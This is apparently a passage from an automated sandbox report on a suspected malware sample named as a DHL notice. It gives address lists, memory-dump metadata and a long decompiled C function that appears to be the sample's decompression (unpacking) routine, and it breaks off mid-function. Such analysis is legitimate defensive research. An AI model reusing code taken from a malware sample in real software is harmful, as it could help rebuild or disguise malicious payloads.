                                                            0x00407489
                                                            0x00407489
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x0040749d
                                                            0x00407458
                                                            0x00407458
                                                            0x0040745b
                                                            0x0040745e
                                                            0x00407461
                                                            0x00407468
                                                            0x004073ac
                                                            0x004073ac
                                                            0x004073af
                                                            0x00000000
                                                            0x00000000
                                                            0x00407543
                                                            0x00407543
                                                            0x00407546
                                                            0x00407447
                                                            0x00407447
                                                            0x00407447
                                                            0x00000000
                                                            0x0040744d
                                                            0x00000000
                                                            0x0040717d
                                                            0x0040717d
                                                            0x0040717f
                                                            0x00407186
                                                            0x00407187
                                                            0x00407189
                                                            0x0040718c
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00407490
                                                            0x00407490
                                                            0x00407493
                                                            0x0040749a
                                                            0x00000000
                                                            0x0040749d
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004071c2
                                                            0x004071c2
                                                            0x004071c5
                                                            0x004071fb
                                                            0x004071fb
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732b
                                                            0x0040732e
                                                            0x0040732e
                                                            0x00407331
                                                            0x00407333

                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.248820039.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.248815920.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248830182.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248836994.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.248873061.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_DHL_Notice_pdf.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                            • Instruction ID: 10cc2cc0f2c892254e5285b7a8bac4c216a70fda8fb68dfa7c3680dd08f727d3
                                                            • Opcode Fuzzy Hash: 9f3cc98df1e3ecd253cf91825a4064c55af45d063240f038e3dc270cc3f81a7c
                                                            • Instruction Fuzzy Hash: 55A15571E04228DBDF28CFA8C8547ADBBB1FF44305F10842AD856BB281D778A986DF45
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
                                                            C-Code - Quality: 98%
                                                            			E00407395() {
                                                            				void _t533;
                                                            				signed int _t534;
                                                            				signed int _t535;
                                                            				signed int* _t605;
                                                            				void* _t612;
                                                            
                                                            				L0:
                                                            				while(1) {
                                                            					L0:
                                                            					if( *(_t612 - 0x40) != 0) {
                                                            						 *(_t612 - 0x84) = 0x13;
                                                            						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
                                                            						goto L132;
                                                            					} else {
                                                            						__eax =  *(__ebp - 0x4c);
                                                            						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                            						__ecx =  *(__ebp - 0x58);
                                                            						__eax =  *(__ebp - 0x4c) << 4;
                                                            						__eax =  *(__ebp - 0x58) + __eax + 4;
                                                            						L130:
                                                            						 *(__ebp - 0x58) = __eax;
                                                            						 *(__ebp - 0x40) = 3;
                                                            						L144:
                                                            						 *(__ebp - 0x7c) = 0x14;
                                                            						L145:
                                                            						__eax =  *(__ebp - 0x40);
                                                            						 *(__ebp - 0x50) = 1;
                                                            						 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                            						L149:
                                                            						if( *(__ebp - 0x48) <= 0) {
                                                            							__ecx =  *(__ebp - 0x40);
                                                            							__ebx =  *(__ebp - 0x50);
                                                            							0 = 1;
                                                            							__eax = 1 << __cl;
                                                            							__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                            							__eax =  *(__ebp - 0x7c);
                                                            							 *(__ebp - 0x44) = __ebx;
                                                            							while(1) {
                                                            								L140:
                                                            								 *(_t612 - 0x88) = _t533;
                                                            								while(1) {
                                                            									L1:
                                                            									_t534 =  *(_t612 - 0x88);
                                                            									if(_t534 > 0x1c) {
                                                            										break;
                                                            									}
                                                            									switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                            										case 0:
                                                            											if( *(_t612 - 0x6c) == 0) {
                                                            												goto L170;
                                                            											}
                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                            											_t534 =  *( *(_t612 - 0x70));
                                                            											if(_t534 > 0xe1) {
                                                            												goto L171;
                                                            											}
                                                            											_t538 = _t534 & 0x000000ff;
                                                            											_push(0x2d);
                                                            											asm("cdq");
                                                            											_pop(_t569);
                                                            											_push(9);
                                                            											_pop(_t570);
                                                            											_t608 = _t538 / _t569;
                                                            											_t540 = _t538 % _t569 & 0x000000ff;
                                                            											asm("cdq");
                                                            											_t603 = _t540 % _t570 & 0x000000ff;
                                                            											 *(_t612 - 0x3c) = _t603;
                                                            											 *(_t612 - 0x1c) = (1 << _t608) - 1;
                                                            											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
                                                            											_t611 = (0x300 << _t603 + _t608) + 0x736;
                                                            											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
                                                            												L10:
                                                            												if(_t611 == 0) {
                                                            													L12:
                                                            													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
                                                            													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                            													goto L15;
                                                            												} else {
                                                            													goto L11;
                                                            												}
                                                            												do {
                                                            													L11:
                                                            													_t611 = _t611 - 1;
                                                            													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
                                                            												} while (_t611 != 0);
                                                            												goto L12;
                                                            											}
                                                            											if( *(_t612 - 4) != 0) {
                                                            												GlobalFree( *(_t612 - 4));
                                                            											}
                                                            											_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                            											 *(_t612 - 4) = _t534;
                                                            											if(_t534 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
                                                            												goto L10;
                                                            											}
                                                            										case 1:
                                                            											L13:
                                                            											__eflags =  *(_t612 - 0x6c);
                                                            											if( *(_t612 - 0x6c) == 0) {
                                                            												 *(_t612 - 0x88) = 1;
                                                            												goto L170;
                                                            											}
                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                            											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                            											_t45 = _t612 - 0x48;
                                                            											 *_t45 =  *(_t612 - 0x48) + 1;
                                                            											__eflags =  *_t45;
                                                            											L15:
                                                            											if( *(_t612 - 0x48) < 4) {
                                                            												goto L13;
                                                            											}
                                                            											_t546 =  *(_t612 - 0x40);
                                                            											if(_t546 ==  *(_t612 - 0x74)) {
                                                            												L20:
                                                            												 *(_t612 - 0x48) = 5;
                                                            												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
                                                            												goto L23;
                                                            											}
                                                            											 *(_t612 - 0x74) = _t546;
                                                            											if( *(_t612 - 8) != 0) {
                                                            												GlobalFree( *(_t612 - 8));
                                                            											}
                                                            											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
                                                            											 *(_t612 - 8) = _t534;
                                                            											if(_t534 == 0) {
                                                            												goto L171;
                                                            											} else {
                                                            												goto L20;
                                                            											}
                                                            										case 2:
                                                            											L24:
                                                            											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
                                                            											 *(_t612 - 0x84) = 6;
                                                            											 *(_t612 - 0x4c) = _t553;
                                                            											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
                                                            											goto L132;
                                                            										case 3:
                                                            											L21:
                                                            											__eflags =  *(_t612 - 0x6c);
                                                            											if( *(_t612 - 0x6c) == 0) {
                                                            												 *(_t612 - 0x88) = 3;
                                                            												goto L170;
                                                            											}
                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                            											_t67 = _t612 - 0x70;
                                                            											 *_t67 =  &(( *(_t612 - 0x70))[1]);
                                                            											__eflags =  *_t67;
                                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                            											L23:
                                                            											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
                                                            											if( *(_t612 - 0x48) != 0) {
                                                            												goto L21;
                                                            											}
                                                            											goto L24;
                                                            										case 4:
                                                            											L133:
                                                            											_t531 =  *_t605;
                                                            											_t588 = _t531 & 0x0000ffff;
                                                            											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
                                                            											if( *(_t612 - 0xc) >= _t564) {
                                                            												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
                                                            												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
                                                            												 *(_t612 - 0x40) = 1;
                                                            												_t532 = _t531 - (_t531 >> 5);
                                                            												__eflags = _t532;
                                                            												 *_t605 = _t532;
                                                            											} else {
                                                            												 *(_t612 - 0x10) = _t564;
                                                            												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
                                                            												 *_t605 = (0x800 - _t588 >> 5) + _t531;
                                                            											}
                                                            											if( *(_t612 - 0x10) >= 0x1000000) {
                                                            												goto L139;
                                                            											} else {
                                                            												goto L137;
                                                            											}
                                                            										case 5:
                                                            											L137:
                                                            											if( *(_t612 - 0x6c) == 0) {
                                                            												 *(_t612 - 0x88) = 5;
                                                            												goto L170;
                                                            											}
                                                            											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
                                                            											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
                                                            											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
                                                            											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
                                                            											L139:
                                                            											_t533 =  *(_t612 - 0x84);
                                                            											goto L140;
                                                            										case 6:
                                                            											__edx = 0;
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x34) = 1;
                                                            												 *(__ebp - 0x84) = 7;
                                                            												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                            												goto L132;
                                                            											}
                                                            											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                            											__esi =  *(__ebp - 0x60);
                                                            											__cl = 8;
                                                            											__cl = 8 -  *(__ebp - 0x3c);
                                                            											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                            											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                            											__ecx =  *(__ebp - 0x3c);
                                                            											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                            											__ecx =  *(__ebp - 4);
                                                            											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                            											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                            											__eflags =  *(__ebp - 0x38) - 4;
                                                            											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                            											if( *(__ebp - 0x38) >= 4) {
                                                            												__eflags =  *(__ebp - 0x38) - 0xa;
                                                            												if( *(__ebp - 0x38) >= 0xa) {
                                                            													_t98 = __ebp - 0x38;
                                                            													 *_t98 =  *(__ebp - 0x38) - 6;
                                                            													__eflags =  *_t98;
                                                            												} else {
                                                            													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                            												}
                                                            											} else {
                                                            												 *(__ebp - 0x38) = 0;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x34) - __edx;
                                                            											if( *(__ebp - 0x34) == __edx) {
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												goto L61;
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x14);
                                                            												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                            												__eflags = __eax -  *(__ebp - 0x74);
                                                            												if(__eax >=  *(__ebp - 0x74)) {
                                                            													__eax = __eax +  *(__ebp - 0x74);
                                                            													__eflags = __eax;
                                                            												}
                                                            												__ecx =  *(__ebp - 8);
                                                            												__ebx = 0;
                                                            												__ebx = 1;
                                                            												__al =  *((intOrPtr*)(__eax + __ecx));
                                                            												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                            												goto L41;
                                                            											}
                                                            										case 7:
                                                            											__eflags =  *(__ebp - 0x40) - 1;
                                                            											if( *(__ebp - 0x40) != 1) {
                                                            												__eax =  *(__ebp - 0x24);
                                                            												 *(__ebp - 0x80) = 0x16;
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x28);
                                                            												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            												__eax =  *(__ebp - 0x2c);
                                                            												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            												__eax = 0;
                                                            												__eflags =  *(__ebp - 0x38) - 7;
                                                            												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                            												__al = __al & 0x000000fd;
                                                            												__eax = (__eflags >= 0) - 1 + 0xa;
                                                            												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                            												__eax =  *(__ebp - 4);
                                                            												__eax =  *(__ebp - 4) + 0x664;
                                                            												__eflags = __eax;
                                                            												 *(__ebp - 0x58) = __eax;
                                                            												goto L69;
                                                            											}
                                                            											__eax =  *(__ebp - 4);
                                                            											__ecx =  *(__ebp - 0x38);
                                                            											 *(__ebp - 0x84) = 8;
                                                            											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                            											goto L132;
                                                            										case 8:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 0xa;
                                                            												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x38);
                                                            												__ecx =  *(__ebp - 4);
                                                            												__eax =  *(__ebp - 0x38) + 0xf;
                                                            												 *(__ebp - 0x84) = 9;
                                                            												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                            												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                            											}
                                                            											goto L132;
                                                            										case 9:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												goto L90;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x60);
                                                            											if( *(__ebp - 0x60) == 0) {
                                                            												goto L171;
                                                            											}
                                                            											__eax = 0;
                                                            											__eflags =  *(__ebp - 0x38) - 7;
                                                            											_t259 =  *(__ebp - 0x38) - 7 >= 0;
                                                            											__eflags = _t259;
                                                            											0 | _t259 = _t259 + _t259 + 9;
                                                            											 *(__ebp - 0x38) = _t259 + _t259 + 9;
                                                            											goto L76;
                                                            										case 0xa:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__eax =  *(__ebp - 4);
                                                            												__ecx =  *(__ebp - 0x38);
                                                            												 *(__ebp - 0x84) = 0xb;
                                                            												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                            												goto L132;
                                                            											}
                                                            											__eax =  *(__ebp - 0x28);
                                                            											goto L89;
                                                            										case 0xb:
                                                            											__eflags =  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x40) != 0) {
                                                            												__ecx =  *(__ebp - 0x24);
                                                            												__eax =  *(__ebp - 0x20);
                                                            												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                            											} else {
                                                            												__eax =  *(__ebp - 0x24);
                                                            											}
                                                            											__ecx =  *(__ebp - 0x28);
                                                            											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                            											L89:
                                                            											__ecx =  *(__ebp - 0x2c);
                                                            											 *(__ebp - 0x2c) = __eax;
                                                            											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                            											L90:
                                                            											__eax =  *(__ebp - 4);
                                                            											 *(__ebp - 0x80) = 0x15;
                                                            											__eax =  *(__ebp - 4) + 0xa68;
                                                            											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                            											goto L69;
                                                            										case 0xc:
                                                            											L100:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xc;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t335 = __ebp - 0x70;
                                                            											 *_t335 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t335;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											__eax =  *(__ebp - 0x2c);
                                                            											goto L102;
                                                            										case 0xd:
                                                            											L37:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xd;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t122 = __ebp - 0x70;
                                                            											 *_t122 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t122;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L39:
                                                            											__eax =  *(__ebp - 0x40);
                                                            											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                            											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                            												goto L48;
                                                            											}
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												goto L54;
                                                            											}
                                                            											L41:
                                                            											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                            											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                            											__ecx =  *(__ebp - 0x58);
                                                            											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                            											 *(__ebp - 0x48) = __eax;
                                                            											__eax = __eax + 1;
                                                            											__eax = __eax << 8;
                                                            											__eax = __eax + __ebx;
                                                            											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edx = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												 *(__ebp - 0x40) = 1;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												__ebx = __ebx + __ebx + 1;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edx;
                                                            												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L39;
                                                            											} else {
                                                            												goto L37;
                                                            											}
                                                            										case 0xe:
                                                            											L46:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xe;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t156 = __ebp - 0x70;
                                                            											 *_t156 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t156;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											while(1) {
                                                            												L48:
                                                            												__eflags = __ebx - 0x100;
                                                            												if(__ebx >= 0x100) {
                                                            													break;
                                                            												}
                                                            												__eax =  *(__ebp - 0x58);
                                                            												__edx = __ebx + __ebx;
                                                            												__ecx =  *(__ebp - 0x10);
                                                            												__esi = __edx + __eax;
                                                            												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            												__ax =  *__esi;
                                                            												 *(__ebp - 0x54) = __esi;
                                                            												__edi = __ax & 0x0000ffff;
                                                            												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            												__eflags =  *(__ebp - 0xc) - __ecx;
                                                            												if( *(__ebp - 0xc) >= __ecx) {
                                                            													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            													__cx = __ax;
                                                            													_t170 = __edx + 1; // 0x1
                                                            													__ebx = _t170;
                                                            													__cx = __ax >> 5;
                                                            													__eflags = __eax;
                                                            													 *__esi = __ax;
                                                            												} else {
                                                            													 *(__ebp - 0x10) = __ecx;
                                                            													0x800 = 0x800 - __edi;
                                                            													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            													__ebx = __ebx + __ebx;
                                                            													 *__esi = __cx;
                                                            												}
                                                            												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            												 *(__ebp - 0x44) = __ebx;
                                                            												if( *(__ebp - 0x10) >= 0x1000000) {
                                                            													continue;
                                                            												} else {
                                                            													goto L46;
                                                            												}
                                                            											}
                                                            											L54:
                                                            											_t173 = __ebp - 0x34;
                                                            											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                            											__eflags =  *_t173;
                                                            											goto L55;
                                                            										case 0xf:
                                                            											L58:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0xf;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t203 = __ebp - 0x70;
                                                            											 *_t203 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t203;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											L60:
                                                            											__eflags = __ebx - 0x100;
                                                            											if(__ebx >= 0x100) {
                                                            												L55:
                                                            												__al =  *(__ebp - 0x44);
                                                            												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                            												goto L56;
                                                            											}
                                                            											L61:
                                                            											__eax =  *(__ebp - 0x58);
                                                            											__edx = __ebx + __ebx;
                                                            											__ecx =  *(__ebp - 0x10);
                                                            											__esi = __edx + __eax;
                                                            											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                            											__ax =  *__esi;
                                                            											 *(__ebp - 0x54) = __esi;
                                                            											__edi = __ax & 0x0000ffff;
                                                            											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                            											__eflags =  *(__ebp - 0xc) - __ecx;
                                                            											if( *(__ebp - 0xc) >= __ecx) {
                                                            												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                            												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                            												__cx = __ax;
                                                            												_t217 = __edx + 1; // 0x1
                                                            												__ebx = _t217;
                                                            												__cx = __ax >> 5;
                                                            												__eflags = __eax;
                                                            												 *__esi = __ax;
                                                            											} else {
                                                            												 *(__ebp - 0x10) = __ecx;
                                                            												0x800 = 0x800 - __edi;
                                                            												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                            												__ebx = __ebx + __ebx;
                                                            												 *__esi = __cx;
                                                            											}
                                                            											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                            											 *(__ebp - 0x44) = __ebx;
                                                            											if( *(__ebp - 0x10) >= 0x1000000) {
                                                            												goto L60;
                                                            											} else {
                                                            												goto L58;
                                                            											}
                                                            										case 0x10:
                                                            											L110:
                                                            											__eflags =  *(__ebp - 0x6c);
                                                            											if( *(__ebp - 0x6c) == 0) {
                                                            												 *(__ebp - 0x88) = 0x10;
                                                            												goto L170;
                                                            											}
                                                            											__ecx =  *(__ebp - 0x70);
                                                            											__eax =  *(__ebp - 0xc);
                                                            											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                            											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                            											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											_t366 = __ebp - 0x70;
                                                            											 *_t366 =  *(__ebp - 0x70) + 1;
                                                            											__eflags =  *_t366;
                                                            											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                            											goto L112;
                                                            										case 0x11:
                                                            											L69:
                                                            											__esi =  *(__ebp - 0x58);
                                                            											 *(__ebp - 0x84) = 0x12;
                                                            											L132:
                                                            											 *(_t612 - 0x54) = _t605;
                                                            											goto L133;
                                                            										case 0x12:
                                                            											goto L0;
                                                            										case 0x13:
                                                            											__eflags =  *(__ebp - 0x40);
